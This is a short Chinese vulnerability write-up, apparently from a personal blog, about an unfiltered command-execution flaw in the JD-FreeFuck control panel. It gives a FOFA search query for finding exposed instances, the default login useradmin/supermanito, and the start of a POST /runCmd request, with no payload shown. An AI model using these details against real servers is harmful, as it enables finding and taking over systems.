漏洞描述
i ⭐
JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck
漏洞影响
s ✅
JD-FreeFuck
空间测绘
d ⭕
FOFA:title="京东薅羊毛控制面板"
漏洞复现
- 访问后登录页面如下
- ✅ 默认账号
useradmin/supermanito
1 | POST /runCmd HTTP/1.1 |
个人博客
孤桜懶契:https://gylq.gitee.io/time